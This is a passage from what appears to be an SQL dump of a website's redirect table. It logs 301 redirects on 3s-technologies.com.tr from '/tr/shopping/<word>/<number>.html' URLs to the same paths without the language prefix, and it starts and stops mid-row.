00:00:00',301),(73004,'https://3s-technologies.com.tr/tr/shopping/energyreleasing/3051288656.html',NULL,'https://3s-technologies.com.tr/shopping/energyreleasing/3051288656.html','',1,0,'2026-06-11 05:11:45','0000-00-00 00:00:00',301),(73005,'https://3s-technologies.com.tr/tr/shopping/porrifolius/3816761193.html',NULL,'https://3s-technologies.com.tr/shopping/porrifolius/3816761193.html','',1,0,'2026-06-11 05:11:48','0000-00-00 00:00:00',301),(73006,'https://3s-technologies.com.tr/tr/shopping/thermotaxic/1292327133.html',NULL,'https://3s-technologies.com.tr/shopping/thermotaxic/1292327133.html','',1,0,'2026-06-11 05:11:51','0000-00-00 00:00:00',301),(73007,'https://3s-technologies.com.tr/tr/shopping/cathartina/1046086585.html',NULL,'https://3s-technologies.com.tr/shopping/cathartina/1046086585.html','',1,0,'2026-06-11 05:11:55','0000-00-00 00:00:00',301),(73008,'https://3s-technologies.com.tr/tr/shopping/cumucirrostratus/3721669545.html',NULL,'https://3s-technologies.com.tr/shopping/cumucirrostratus/3721669545.html','',1,0,'2026-06-11 05:11:58','0000-00-00 00:00:00',301),(73009,'https://3s-technologies.com.tr/tr/shopping/heniquen/658540807.html',NULL,'https://3s-technologies.com.tr/shopping/heniquen/658540807.html','',1,0,'2026-06-11 05:12:00','0000-00-00 00:00:00',301),(73010,'https://3s-technologies.com.tr/tr/shopping/quotidian/2471174859.html',NULL,'https://3s-technologies.com.tr/shopping/quotidian/2471174859.html','',1,0,'2026-06-11 05:12:03','0000-00-00 00:00:00',301),(73011,'https://3s-technologies.com.tr/tr/shopping/octosyllabic/3526143856.html',NULL,'https://3s-technologies.com.tr/shopping/octosyllabic/3526143856.html','',1,0,'2026-06-11 05:12:06','0000-00-00 00:00:00',301),(73012,'https://3s-technologies.com.tr/tr/shopping/buttonwood/3470858181.html',NULL,'https://3s-technologies.com.tr/shopping/buttonwood/3470858181.html','',1,0,'2026-06-11 05:12:13','0000-00-00 00:00:00',301),(73013,'https://3s-technologies.com.tr/tr/shopping/corah/3079710676.html',NULL,'https://3s-technologies.com.tr/shopping/corah/3079710676.html','',1,0,'2026-06-11 05:12:18','0000-00-00 00:00:00',301),(73014,'https://3s-technologies.com.tr/tr/shopping/hitting/2392302531.html',NULL,'https://3s-technologies.com.tr/shopping/hitting/2392302531.html','',1,0,'2026-06-11 05:12:23','0000-00-00 00:00:00',301),(73015,'https://3s-technologies.com.tr/tr/shopping/bellfaced/2388925858.html',NULL,'https://3s-technologies.com.tr/shopping/bellfaced/2388925858.html','',1,0,'2026-06-11 05:12:26','0000-00-00 00:00:00',301),(73016,'https://3s-technologies.com.tr/tr/shopping/churn/1507283151.html',NULL,'https://3s-technologies.com.tr/shopping/churn/1507283151.html','',1,0,'2026-06-11 05:12:29','0000-00-00 00:00:00',301),(73017,'https://3s-technologies.com.tr/tr/shopping/sprenge/4283876751.html',NULL,'https://3s-technologies.com.tr/shopping/sprenge/4283876751.html','',1,0,'2026-06-11 05:12:32','0000-00-00 00:00:00',301),(73018,'https://3s-technologies.com.tr/tr/shopping/atheistic/927675916.html',NULL,'https://3s-technologies.com.tr/shopping/atheistic/927675916.html','',1,0,'2026-06-11 05:12:35','0000-00-00 00:00:00',301),(73019,'https://3s-technologies.com.tr/tr/shopping/infructuose/4076796879.html',NULL,'https://3s-technologies.com.tr/shopping/infructuose/4076796879.html','',1,0,'2026-06-11 05:12:40','0000-00-00 00:00:00',301),(73020,'https://3s-technologies.com.tr/tr/shopping/brickwork/385857831.html',NULL,'https://3s-technologies.com.tr/shopping/brickwork/385857831.html','',1,0,'2026-06-11 05:12:42','0000-00-00 00:00:00',301),(73021,'https://3s-technologies.com.tr/tr/shopping/donax/2819767494.html',NULL,'https://3s-technologies.com.tr/shopping/donax/2819767494.html','',1,0,'2026-06-11 05:12:45','0000-00-00 00:00:00',301),(73022,'https://3s-technologies.com.tr/tr/shopping/chalcopyrite/995162487.html',NULL,'https://3s-technologies.com.tr/shopping/chalcopyrite/995162487.html','',1,0,'2026-06-11 05:12:48','0000-00-00 00:00:00',301),(73023,'https://3s-technologies.com.tr/tr/shopping/modicity/2966146538.html',NULL,'https://3s-technologies.com.tr/shopping/modicity/2966146538.html','',1,0,'2026-06-11 05:12:51','0000-00-00 00:00:00',301),(73024,'https://3s-technologies.com.tr/tr/shopping/bdelloidea/4238748621.html',NULL,'https://3s-technologies.com.tr/shopping/bdelloidea/4238748621.html','',1,0,'2026-06-11 05:12:54','0000-00-00 00:00:00',301),(73025,'https://3s-technologies.com.tr/tr/shopping/nativity/3124581033.html',NULL,'https://3s-technologies.com.tr/shopping/nativity/3124581033.html','',1,0,'2026-06-11 05:12:57','0000-00-00 00:00:00',301),(73026,'https://3s-technologies.com.tr/tr/shopping/surfel/2005665678.html',NULL,'https://3s-technologies.com.tr/shopping/surfel/2005665678.html','',1,0,'2026-06-11 05:13:02','0000-00-00 00:00:00',301),(73027,'https://3s-technologies.com.tr/tr/shopping/endermic/4059441825.html',NULL,'https://3s-technologies.com.tr/shopping/endermic/4059441825.html','',1,0,'2026-06-11 05:13:04','0000-00-00 00:00:00',301),(73028,'https://3s-technologies.com.tr/tr/shopping/dally/1636938145.html',NULL,'https://3s-technologies.com.tr/shopping/dally/1636938145.html','',1,0,'2026-06-11 05:13:07','0000-00-00 00:00:00',301),(73029,'https://3s-technologies.com.tr/tr/shopping/gynarchy/930263621.html',NULL,'https://3s-technologies.com.tr/shopping/gynarchy/930263621.html','',1,0,'2026-06-11 05:13:10','0000-00-00 00:00:00',301),(73030,'https://3s-technologies.com.tr/tr/shopping/burlaps/1909091121.html',NULL,'https://3s-technologies.com.tr/shopping/burlaps/1909091121.html','',1,0,'2026-06-11 05:13:13','0000-00-00 00:00:00',301),(73031,'https://3s-technologies.com.tr/tr/shopping/alepole/562018776.html',NULL,'https://3s-technologies.com.tr/shopping/alepole/562018776.html','',1,0,'2026-06-11 05:13:16','0000-00-00 00:00:00',301),(73032,'https://3s-technologies.com.tr/tr/shopping/deoxidizer/132214985.html',NULL,'https://3s-technologies.com.tr/shopping/deoxidizer/132214985.html','',1,0,'2026-06-11 05:13:19','0000-00-00 00:00:00',301),(73033,'https://3s-technologies.com.tr/tr/shopping/saphead/299576880.html',NULL,'https://3s-technologies.com.tr/shopping/saphead/299576880.html','',1,0,'2026-06-11 05:13:26','0000-00-00 00:00:00',301),(73034,'https://3s-technologies.com.tr/tr/shopping/odometry/2499911691.html',NULL,'https://3s-technologies.com.tr/shopping/odometry/2499911691.html','',1,0,'2026-06-11 05:13:29','0000-00-00 00:00:00',301),(73035,'https://3s-technologies.com.tr/tr/shopping/unorderly/2340384131.html',NULL,'https://3s-technologies.com.tr/shopping/unorderly/2340384131.html','',1,0,'2026-06-11 05:13:32','0000-00-00 00:00:00',301),(73036,'https://3s-technologies.com.tr/tr/shopping/bedewer/407390792.html',NULL,'https://3s-technologies.com.tr/shopping/bedewer/407390792.html','',1,0,'2026-06-11 05:13:35','0000-00-00 00:00:00',301),(73037,'https://3s-technologies.com.tr/tr/shopping/dahabeah/2918073746.html',NULL,'https://3s-technologies.com.tr/shopping/dahabeah/2918073746.html','',1,0,'2026-06-11 05:13:38','0000-00-00 00:00:00',301),(73038,'https://3s-technologies.com.tr/tr/shopping/wheezed/1784819442.html',NULL,'https://3s-technologies.com.tr/shopping/wheezed/1784819442.html','',1,0,'2026-06-11 05:13:41','0000-00-00 00:00:00',301),(73039,'https://3s-technologies.com.tr/tr/shopping/knotty/261767971.html',NULL,'https://3s-technologies.com.tr/shopping/knotty/261767971.html','',1,0,'2026-06-11 05:13:44','0000-00-00 00:00:00',301),(73040,'https://3s-technologies.com.tr/tr/shopping/cutworm/3881765574.html',NULL,'https://3s-technologies.com.tr/shopping/cutworm/3881765574.html','',1,0,'2026-06-11 05:14:10','0000-00-00 00:00:00',301),(73041,'https://3s-technologies.com.tr/tr/shopping/emboldener/2426656582.html',NULL,'https://3s-technologies.com.tr/shopping/emboldener/2426656582.html','',1,0,'2026-06-11 05:14:13','0000-00-00 00:00:00',301),(73042,'https://3s-technologies.com.tr/tr/shopping/roody/705454042.html',NULL,'https://3s-technologies.com.tr/shopping/roody/705454042.html','',1,0,'2026-06-11 05:14:16','0000-00-00 00:00:00',301),(73043,'https://3s-technologies.com.tr/tr/shopping/obliterating/3964739505.html',NULL,'https://3s-technologies.com.tr/shopping/obliterating/3964739505.html','',1,0,'2026-06-11 05:14:19','0000-00-00 00:00:00',301),(73044,'https://3s-technologies.com.tr/tr/shopping/chasuble/1284076405.html',NULL,'https://3s-technologies.com.tr/shopping/chasuble/1284076405.html','',1,0,'2026-06-11 05:14:22','0000-00-00 00:00:00',301),(73045,'https://3s-technologies.com.tr/tr/shopping/aorta/3547522344.html',NULL,'https://3s-technologies.com.tr/shopping/aorta/3547522344.html','',1,0,'2026-06-11 05:14:25','0000-00-00 00:00:00',301),(73046,'https://3s-technologies.com.tr/tr/shopping/beduck/1475275129.html',NULL,'https://3s-technologies.com.tr/shopping/beduck/1475275129.html','',1,0,'2026-06-11 05:14:28','0000-00-00 00:00:00',301),(73047,'https://3s-technologies.com.tr/tr/shopping/chela/1818103235.html',NULL,'https://3s-technologies.com.tr/shopping/chela/1818103235.html','',1,0,'2026-06-11 05:14:33','0000-00-00 00:00:00',301),(73048,'https://3s-technologies.com.tr/tr/shopping/vitiating/3132631880.html',NULL,'https://3s-technologies.com.tr/shopping/vitiating/3132631880.html','',1,0,'2026-06-11 05:14:36','0000-00-00 00:00:00',301),(73049,'https://3s-technologies.com.tr/tr/shopping/armourer/3910475044.html',NULL,'https://3s-technologies.com.tr/shopping/armourer/3910475044.html','',1,0,'2026-06-11 05:14:39','0000-00-00 00:00:00',301),(73050,'https://3s-technologies.com.tr/tr/shopping/augustinian/2218591854.html',NULL,'https://3s-technologies.com.tr/shopping/augustinian/2218591854.html','',1,0,'2026-06-11 05:14:42','0000-00-00 00:00:00',301),(73051,'https://3s-technologies.com.tr/tr/shopping/dandified/693899875.html',NULL,'https://3s-technologies.com.tr/shopping/dandified/693899875.html','',1,0,'2026-06-11 05:14:45','0000-00-00 00:00:00',301),(73052,'https://3s-technologies.com.tr/tr/shopping/laving/999751291.html',NULL,'https://3s-technologies.com.tr/shopping/laving/999751291.html','',1,0,'2026-06-11 05:14:48','0000-00-00 00:00:00',301),(73053,'https://3s-technologies.com.tr/tr/shopping/greenockite/3229905663.html',NULL,'https://3s-technologies.com.tr/shopping/greenockite/3229905663.html','',1,0,'2026-06-11 05:14:51','0000-00-00 00:00:00',301),(73054,'https://3s-technologies.com.tr/tr/shopping/wellbeing/4129849209.html',NULL,'https://3s-technologies.com.tr/shopping/wellbeing/4129849209.html','',1,0,'2026-06-11 05:15:01','0000-00-00 00:00:00',301),(73055,'https://3s-technologies.com.tr/tr/shopping/beylic/634061770.html',NULL,'https://3s-technologies.com.tr/shopping/beylic/634061770.html','',1,0,'2026-06-11 05:15:03','0000-00-00 00:00:00',301),(73056,'https://3s-technologies.com.tr/tr/shopping/exemption/2130871552.html',NULL,'https://3s-technologies.com.tr/shopping/exemption/2130871552.html','',1,0,'2026-06-11 05:15:06','0000-00-00 00:00:00',301),(73057,'https://3s-technologies.com.tr/tr/shopping/piled/3175728761.html',NULL,'https://3s-technologies.com.tr/shopping/piled/3175728761.html','',1,0,'2026-06-11 05:15:09','0000-00-00 00:00:00',301),(73058,'https://3s-technologies.com.tr/tr/shopping/centurial/976086469.html',NULL,'https://3s-technologies.com.tr/shopping/centurial/976086469.html','',1,0,'2026-06-11 05:15:12','0000-00-00 00:00:00',301),(73059,'https://3s-technologies.com.tr/tr/shopping/overrule/3003867862.html',NULL,'https://3s-technologies.com.tr/shopping/overrule/3003867862.html','',1,0,'2026-06-11 05:15:15','0000-00-00 00:00:00',301),(73060,'https://3s-technologies.com.tr/tr/shopping/giggly/1556873438.html',NULL,'https://3s-technologies.com.tr/shopping/giggly/1556873438.html','',1,0,'2026-06-11 05:15:18','0000-00-00 00:00:00',301),(73061,'https://3s-technologies.com.tr/tr/shopping/myrtillocactus/1107626734.html',NULL,'https://3s-technologies.com.tr/shopping/myrtillocactus/1107626734.html','',1,0,'2026-06-11 05:15:23','0000-00-00 00:00:00',301),(73062,'https://3s-technologies.com.tr/tr/shopping/doughtier/3905722749.html',NULL,'https://3s-technologies.com.tr/shopping/doughtier/3905722749.html','',1,0,'2026-06-11 05:15:25','0000-00-00 00:00:00',301),(73063,'https://3s-technologies.com.tr/tr/shopping/wretchedly/253880647.html',NULL,'https://3s-technologies.com.tr/shopping/wretchedly/253880647.html','',1,0,'2026-06-11 05:15:28','0000-00-00 00:00:00',301),(73064,'https://3s-technologies.com.tr/tr/shopping/qualification/3019095234.html',NULL,'https://3s-technologies.com.tr/shopping/qualification/3019095234.html','',1,0,'2026-06-11 05:15:31','0000-00-00 00:00:00',301),(73065,'https://3s-technologies.com.tr/tr/shopping/carabus/2052864132.html',NULL,'https://3s-technologies.com.tr/shopping/carabus/2052864132.html','',1,0,'2026-06-11 05:15:35','0000-00-00 00:00:00',301),(73066,'https://3s-technologies.com.tr/tr/shopping/copland/708041763.html',NULL,'https://3s-technologies.com.tr/shopping/copland/708041763.html','',1,0,'2026-06-11 05:15:37','0000-00-00 00:00:00',301),(73067,'https://3s-technologies.com.tr/tr/shopping/hoppet/2905999999.html',NULL,'https://3s-technologies.com.tr/shopping/hoppet/2905999999.html','',1,0,'2026-06-11 05:15:40','0000-00-00 00:00:00',301),(73068,'https://3s-technologies.com.tr/tr/shopping/ascendant/12928129.html',NULL,'https://3s-technologies.com.tr/shopping/ascendant/12928129.html','',1,0,'2026-06-11 05:15:46','0000-00-00 00:00:00',301),(73069,'https://3s-technologies.com.tr/tr/shopping/chastely/3092564527.html',NULL,'https://3s-technologies.com.tr/shopping/chastely/3092564527.html','',1,0,'2026-06-11 05:15:48','0000-00-00 00:00:00',301),(73070,'https://3s-technologies.com.tr/tr/shopping/poler/2819603971.html',NULL,'https://3s-technologies.com.tr/shopping/poler/2819603971.html','',1,0,'2026-06-11 05:15:51','0000-00-00 00:00:00',301),(73071,'https://3s-technologies.com.tr/tr/shopping/nonsensically/724867837.html',NULL,'https://3s-technologies.com.tr/shopping/nonsensically/724867837.html','',1,0,'2026-06-11 05:15:54','0000-00-00 00:00:00',301),(73072,'https://3s-technologies.com.tr/tr/shopping/substanceless/1309560475.html',NULL,'https://3s-technologies.com.tr/shopping/substanceless/1309560475.html','',1,0,'2026-06-11 05:15:57','0000-00-00 00:00:00',301),(73073,'https://3s-technologies.com.tr/tr/shopping/indefective/135805890.html',NULL,'https://3s-technologies.com.tr/shopping/indefective/135805890.html','',1,0,'2026-06-11 05:16:00','0000-00-00 00:00:00',301),(73074,'https://3s-technologies.com.tr/tr/shopping/modenese/1775188189.html',NULL,'https://3s-technologies.com.tr/shopping/modenese/1775188189.html','',1,0,'2026-06-11 05:16:03','0000-00-00 00:00:00',301),(73075,'https://3s-technologies.com.tr/tr/shopping/trivet/253717124.html',NULL,'https://3s-technologies.com.tr/shopping/trivet/253717124.html','',1,0,'2026-06-11 05:16:16','0000-00-00 00:00:00',301),(73076,'https://3s-technologies.com.tr/tr/shopping/imband/3314282012.html',NULL,'https://3s-technologies.com.tr/shopping/imband/3314282012.html','',1,0,'2026-06-11 05:16:18','0000-00-00 00:00:00',301),(73077,'https://3s-technologies.com.tr/tr/shopping/inoculation/2042522080.html',NULL,'https://3s-technologies.com.tr/shopping/inoculation/2042522080.html','',1,0,'2026-06-11 05:16:21','0000-00-00 00:00:00',301),(73078,'https://3s-technologies.com.tr/tr/shopping/fivefinger/111926868.html',NULL,'https://3s-technologies.com.tr/shopping/fivefinger/111926868.html','',1,0,'2026-06-11 05:16:24','0000-00-00 00:00:00',301),(73079,'https://3s-technologies.com.tr/tr/shopping/modernize/3195671552.html',NULL,'https://3s-technologies.com.tr/shopping/modernize/3195671552.html','',1,0,'2026-06-11 05:16:27','0000-00-00 00:00:00',301),(73080,'https://3s-technologies.com.tr/tr/shopping/paramaleic/2427946850.html',NULL,'https://3s-technologies.com.tr/shopping/paramaleic/2427946850.html','',1,0,'2026-06-11 05:16:35','0000-00-00 00:00:00',301),(73081,'https://3s-technologies.com.tr/tr/shopping/gelsemine/2769028828.html',NULL,'https://3s-technologies.com.tr/shopping/gelsemine/2769028828.html','',1,0,'2026-06-11 05:16:37','0000-00-00 00:00:00',301),(73082,'https://3s-technologies.com.tr/tr/shopping/mingler/1376412392.html',NULL,'https://3s-technologies.com.tr/shopping/mingler/1376412392.html','',1,0,'2026-06-11 05:16:40','0000-00-00 00:00:00',301),(73083,'https://3s-technologies.com.tr/tr/shopping/anamese/1592430172.html',NULL,'https://3s-technologies.com.tr/shopping/anamese/1592430172.html','',1,0,'2026-06-11 05:16:43','0000-00-00 00:00:00',301),(73084,'https://3s-technologies.com.tr/tr/shopping/rectificator/3850086829.html',NULL,'https://3s-technologies.com.tr/shopping/rectificator/3850086829.html','',1,0,'2026-06-11 05:16:46','0000-00-00 00:00:00',301),(73085,'https://3s-technologies.com.tr/tr/shopping/nephthys/4075584780.html',NULL,'https://3s-technologies.com.tr/shopping/nephthys/4075584780.html','',1,0,'2026-06-11 05:16:49','0000-00-00 00:00:00',301),(73086,'https://3s-technologies.com.tr/tr/shopping/hereinbefore/3757603859.html',NULL,'https://3s-technologies.com.tr/shopping/hereinbefore/3757603859.html','',1,0,'2026-06-11 05:16:54','0000-00-00 00:00:00',301),(73087,'https://3s-technologies.com.tr/tr/shopping/deservedness/1185259076.html',NULL,'https://3s-technologies.com.tr/shopping/deservedness/1185259076.html','',1,0,'2026-06-11 05:16:56','0000-00-00 00:00:00',301),(73088,'https://3s-technologies.com.tr/tr/shopping/pound/3641116231.html',NULL,'https://3s-technologies.com.tr/shopping/pound/3641116231.html','',1,0,'2026-06-11 05:16:59','0000-00-00 00:00:00',301),(73089,'https://3s-technologies.com.tr/tr/shopping/tillering/4088965367.html',NULL,'https://3s-technologies.com.tr/shopping/tillering/4088965367.html','',1,0,'2026-06-11 05:17:02','0000-00-00 00:00:00',301),(73090,'https://3s-technologies.com.tr/tr/shopping/location/1064003030.html',NULL,'https://3s-technologies.com.tr/shopping/location/1064003030.html','',1,0,'2026-06-11 05:17:05','0000-00-00 00:00:00',301),(73091,'https://3s-technologies.com.tr/tr/shopping/neglected/3485759333.html',NULL,'https://3s-technologies.com.tr/shopping/neglected/3485759333.html','',1,0,'2026-06-11 05:17:08','0000-00-00 00:00:00',301),(73092,'https://3s-technologies.com.tr/tr/shopping/flinthearted/3036765910.html',NULL,'https://3s-technologies.com.tr/shopping/flinthearted/3036765910.html','',1,0,'2026-06-11 05:17:13','0000-00-00 00:00:00',301),(73093,'https://3s-technologies.com.tr/tr/shopping/observance/925040179.html',NULL,'https://3s-technologies.com.tr/shopping/observance/925040179.html','',1,0,'2026-06-11 05:17:15','0000-00-00 00:00:00',301),(73094,'https://3s-technologies.com.tr/tr/shopping/dentized/2405683150.html',NULL,'https://3s-technologies.com.tr/shopping/dentized/2405683150.html','',1,0,'2026-06-11 05:17:18','0000-00-00 00:00:00',301),(73095,'https://3s-technologies.com.tr/tr/shopping/starch/597623888.html',NULL,'https://3s-technologies.com.tr/shopping/starch/597623888.html','',1,0,'2026-06-11 05:17:21','0000-00-00 00:00:00',301),(73096,'https://3s-technologies.com.tr/tr/shopping/brogues/4283050759.html',NULL,'https://3s-technologies.com.tr/shopping/brogues/4283050759.html','',1,0,'2026-06-11 05:17:24','0000-00-00 00:00:00',301),(73097,'https://3s-technologies.com.tr/tr/shopping/fluffy/2985946440.html',NULL,'https://3s-technologies.com.tr/shopping/fluffy/2985946440.html','',1,0,'2026-06-11 05:17:27','0000-00-00 00:00:00',301),(73098,'https://3s-technologies.com.tr/tr/shopping/asses/1090445918.html',NULL,'https://3s-technologies.com.tr/shopping/asses/1090445918.html','',1,0,'2026-06-11 05:17:44','0000-00-00 00:00:00',301),(73099,'https://3s-technologies.com.tr/tr/shopping/pushed/2002288989.html',NULL,'https://3s-technologies.com.tr/shopping/pushed/2002288989.html','',1,0,'2026-06-11 05:17:46','0000-00-00 00:00:00',301),(73100,'https://3s-technologies.com.tr/tr/shopping/chank/3658471285.html',NULL,'https://3s-technologies.com.tr/shopping/chank/3658471285.html','',1,0,'2026-06-11 05:17:49','0000-00-00 00:00:00',301),(73101,'https://3s-technologies.com.tr/tr/shopping/reachable/2228404926.html',NULL,'https://3s-technologies.com.tr/shopping/reachable/2228404926.html','',1,0,'2026-06-11 05:17:52','0000-00-00 00:00:00',301),(73102,'https://3s-technologies.com.tr/tr/shopping/allurement/4033352805.html',NULL,'https://3s-technologies.com.tr/shopping/allurement/4033352805.html','',1,0,'2026-06-11 05:17:55','0000-00-00 00:00:00',301),(73103,'https://3s-technologies.com.tr/tr/shopping/reverendly/466920318.html',NULL,'https://3s-technologies.com.tr/shopping/reverendly/466920318.html','',1,0,'2026-06-11 05:17:58','0000-00-00 00:00:00',301),(73104,'https://3s-technologies.com.tr/tr/shopping/spermosphere/1679611531.html',NULL,'https://3s-technologies.com.tr/shopping/spermosphere/1679611531.html','',1,0,'2026-06-11 05:18:05','0000-00-00 00:00:00',301),(73105,'https://3s-technologies.com.tr/tr/shopping/facilitating/2366654954.html',NULL,'https://3s-technologies.com.tr/shopping/facilitating/2366654954.html','',1,0,'2026-06-11 05:18:07','0000-00-00 00:00:00',301),(73106,'https://3s-technologies.com.tr/tr/shopping/elucidation/2453352751.html',NULL,'https://3s-technologies.com.tr/shopping/elucidation/2453352751.html','',1,0,'2026-06-11 05:18:10','0000-00-00 00:00:00',301),(73107,'https://3s-technologies.com.tr/tr/shopping/guiler/1108838833.html',NULL,'https://3s-technologies.com.tr/shopping/guiler/1108838833.html','',1,0,'2026-06-11 05:18:13','0000-00-00 00:00:00',301),(73108,'https://3s-technologies.com.tr/tr/shopping/chainsaw/2437518230.html',NULL,'https://3s-technologies.com.tr/shopping/chainsaw/2437518230.html','',1,0,'2026-06-11 05:18:16','0000-00-00 00:00:00',301),(73109,'https://3s-technologies.com.tr/tr/shopping/teemer/1439960071.html',NULL,'https://3s-technologies.com.tr/shopping/teemer/1439960071.html','',1,0,'2026-06-11 05:18:19','0000-00-00 00:00:00',301),(73110,'https://3s-technologies.com.tr/tr/shopping/fineless/55160072.html',NULL,'https://3s-technologies.com.tr/shopping/fineless/55160072.html','',1,0,'2026-06-11 05:18:48','0000-00-00 00:00:00',301),(73111,'https://3s-technologies.com.tr/tr/shopping/costumer/3787519130.html',NULL,'https://3s-technologies.com.tr/shopping/costumer/3787519130.html','',1,0,'2026-06-11 05:18:50','0000-00-00 00:00:00',301),(73112,'https://3s-technologies.com.tr/tr/shopping/artlessness/1415083182.html',NULL,'https://3s-technologies.com.tr/shopping/artlessness/1415083182.html','',1,0,'2026-06-11 05:18:53','0000-00-00 00:00:00',301),(73113,'https://3s-technologies.com.tr/tr/shopping/pliers/877314957.html',NULL,'https://3s-technologies.com.tr/shopping/pliers/877314957.html','',1,0,'2026-06-11 05:18:56','0000-00-00 00:00:00',301),(73114,'https://3s-technologies.com.tr/tr/shopping/hypochondriasm/1894767398.html',NULL,'https://3s-technologies.com.tr/shopping/hypochondriasm/1894767398.html','',1,0,'2026-06-11 05:18:59','0000-00-00 00:00:00',301),(73115,'https://3s-technologies.com.tr/tr/shopping/tangibility/296200191.html',NULL,'https://3s-technologies.com.tr/shopping/tangibility/296200191.html','',1,0,'2026-06-11 05:19:02','0000-00-00 00:00:00',301),(73116,'https://3s-technologies.com.tr/tr/shopping/spurrer/2801689391.html',NULL,'https://3s-technologies.com.tr/shopping/spurrer/2801689391.html','',1,0,'2026-06-11 05:19:20','0000-00-00 00:00:00',301),(73117,'https://3s-technologies.com.tr/tr/shopping/serratula/3534719202.html',NULL,'https://3s-technologies.com.tr/shopping/serratula/3534719202.html','',1,0,'2026-06-11 05:19:24','0000-00-00 00:00:00',301),(73118,'https://3s-technologies.com.tr/tr/shopping/curbstone/69694925.html',NULL,'https://3s-technologies.com.tr/shopping/curbstone/69694925.html','',1,0,'2026-06-11 05:19:29','0000-00-00 00:00:00',301),(73119,'https://3s-technologies.com.tr/tr/shopping/wilded/2223652599.html',NULL,'https://3s-technologies.com.tr/shopping/wilded/2223652599.html','',1,0,'2026-06-11 05:19:32','0000-00-00 00:00:00',301),(73120,'https://3s-technologies.com.tr/tr/shopping/badminton/3984864083.html',NULL,'https://3s-technologies.com.tr/shopping/badminton/3984864083.html','',1,0,'2026-06-11 05:19:35','0000-00-00 00:00:00',301),(73121,'https://3s-technologies.com.tr/tr/shopping/easement/1788196115.html',NULL,'https://3s-technologies.com.tr/shopping/easement/1788196115.html','',1,0,'2026-06-11 05:19:38','0000-00-00 00:00:00',301),(73122,'https://3s-technologies.com.tr/tr/shopping/prominently/3377496790.html',NULL,'https://3s-technologies.com.tr/shopping/prominently/3377496790.html','',1,0,'2026-06-11 05:19:59','0000-00-00 00:00:00',301),(73123,'https://3s-technologies.com.tr/tr/shopping/schiller/1779499073.html',NULL,'https://3s-technologies.com.tr/shopping/schiller/1779499073.html','',1,0,'2026-06-11 05:20:03','0000-00-00 00:00:00',301),(73124,'https://3s-technologies.com.tr/tr/shopping/untune/2238716448.html',NULL,'https://3s-technologies.com.tr/shopping/untune/2238716448.html','',1,0,'2026-06-11 05:20:06','0000-00-00 00:00:00',301),(73125,'https://3s-technologies.com.tr/tr/shopping/dendroaspis/4133225898.html',NULL,'https://3s-technologies.com.tr/shopping/dendroaspis/4133225898.html','',1,0,'2026-06-11 05:20:09','0000-00-00 00:00:00',301),(73126,'https://3s-technologies.com.tr/tr/shopping/saucily/1162410743.html',NULL,'https://3s-technologies.com.tr/shopping/saucily/1162410743.html','',1,0,'2026-06-11 05:20:12','0000-00-00 00:00:00',301),(73127,'https://3s-technologies.com.tr/tr/shopping/poller/2628590323.html',NULL,'https://3s-technologies.com.tr/shopping/poller/2628590323.html','',1,0,'2026-06-11 05:20:15','0000-00-00 00:00:00',301),(73128,'https://3s-technologies.com.tr/tr/shopping/essence/91031618.html',NULL,'https://3s-technologies.com.tr/shopping/essence/91031618.html','',1,0,'2026-06-11 05:20:49','0000-00-00 00:00:00',301),(73129,'https://3s-technologies.com.tr/tr/shopping/bondsman/304455822.html',NULL,'https://3s-technologies.com.tr/shopping/bondsman/304455822.html','',1,0,'2026-06-11 05:20:50','0000-00-00 00:00:00',301),(73130,'https://3s-technologies.com.tr/tr/shopping/eulogistically/648040135.html',NULL,'https://3s-technologies.com.tr/shopping/eulogistically/648040135.html','',1,0,'2026-06-11 05:20:53','0000-00-00 00:00:00',301),(73131,'https://3s-technologies.com.tr/tr/shopping/tottled/2051652049.html',NULL,'https://3s-technologies.com.tr/shopping/tottled/2051652049.html','',1,0,'2026-06-11 05:20:56','0000-00-00 00:00:00',301),(73132,'https://3s-technologies.com.tr/tr/shopping/helminthagogue/40999904.html',NULL,'https://3s-technologies.com.tr/shopping/helminthagogue/40999904.html','',1,0,'2026-06-11 05:20:59','0000-00-00 00:00:00',301),(73133,'https://3s-technologies.com.tr/tr/shopping/diggings/149657608.html',NULL,'https://3s-technologies.com.tr/shopping/diggings/149657608.html','',1,0,'2026-06-11 05:21:02','0000-00-00 00:00:00',301),(73134,'https://3s-technologies.com.tr/tr/shopping/inning/4063511017.html',NULL,'https://3s-technologies.com.tr/shopping/inning/4063511017.html','',1,0,'2026-06-11 05:21:24','0000-00-00 00:00:00',301),(73135,'https://3s-technologies.com.tr/tr/shopping/classificatory/3239814804.html',NULL,'https://3s-technologies.com.tr/shopping/classificatory/3239814804.html','',1,0,'2026-06-11 05:21:27','0000-00-00 00:00:00',301),(73136,'https://3s-technologies.com.tr/tr/shopping/dissertate/150869723.html',NULL,'https://3s-technologies.com.tr/shopping/dissertate/150869723.html','',1,0,'2026-06-11 05:21:30','0000-00-00 00:00:00',301),(73137,'https://3s-technologies.com.tr/tr/shopping/propidene/375546309.html',NULL,'https://3s-technologies.com.tr/shopping/propidene/375546309.html','',1,0,'2026-06-11 05:21:33','0000-00-00 00:00:00',301),(73138,'https://3s-technologies.com.tr/tr/shopping/readjustment/607183798.html',NULL,'https://3s-technologies.com.tr/shopping/readjustment/607183798.html','',1,0,'2026-06-11 05:21:36','0000-00-00 00:00:00',301),(73139,'https://3s-technologies.com.tr/tr/shopping/curiousness/1400886090.html',NULL,'https://3s-technologies.com.tr/shopping/curiousness/1400886090.html','',1,0,'2026-06-11 05:21:39','0000-00-00 00:00:00',301),(73140,'https://3s-technologies.com.tr/tr/shopping/deponent/329169188.html',NULL,'https://3s-technologies.com.tr/shopping/deponent/329169188.html','',1,0,'2026-06-11 05:21:44','0000-00-00 00:00:00',301),(73141,'https://3s-technologies.com.tr/tr/shopping/graven/2027860596.html',NULL,'https://3s-technologies.com.tr/shopping/graven/2027860596.html','',1,0,'2026-06-11 05:21:46','0000-00-00 00:00:00',301),(73142,'https://3s-technologies.com.tr/tr/shopping/flench/3957217638.html',NULL,'https://3s-technologies.com.tr/shopping/flench/3957217638.html','',1,0,'2026-06-11 05:21:49','0000-00-00 00:00:00',301),(73143,'https://3s-technologies.com.tr/tr/shopping/tabulata/1830906393.html',NULL,'https://3s-technologies.com.tr/shopping/tabulata/1830906393.html','',1,0,'2026-06-11 05:21:52','0000-00-00 00:00:00',301),(73144,'https://3s-technologies.com.tr/tr/shopping/irideus/1360740568.html',NULL,'https://3s-technologies.com.tr/shopping/irideus/1360740568.html','',1,0,'2026-06-11 05:21:55','0000-00-00 00:00:00',301),(73145,'https://3s-technologies.com.tr/tr/shopping/amputator/829014906.html',NULL,'https://3s-technologies.com.tr/shopping/amputator/829014906.html','',1,0,'2026-06-11 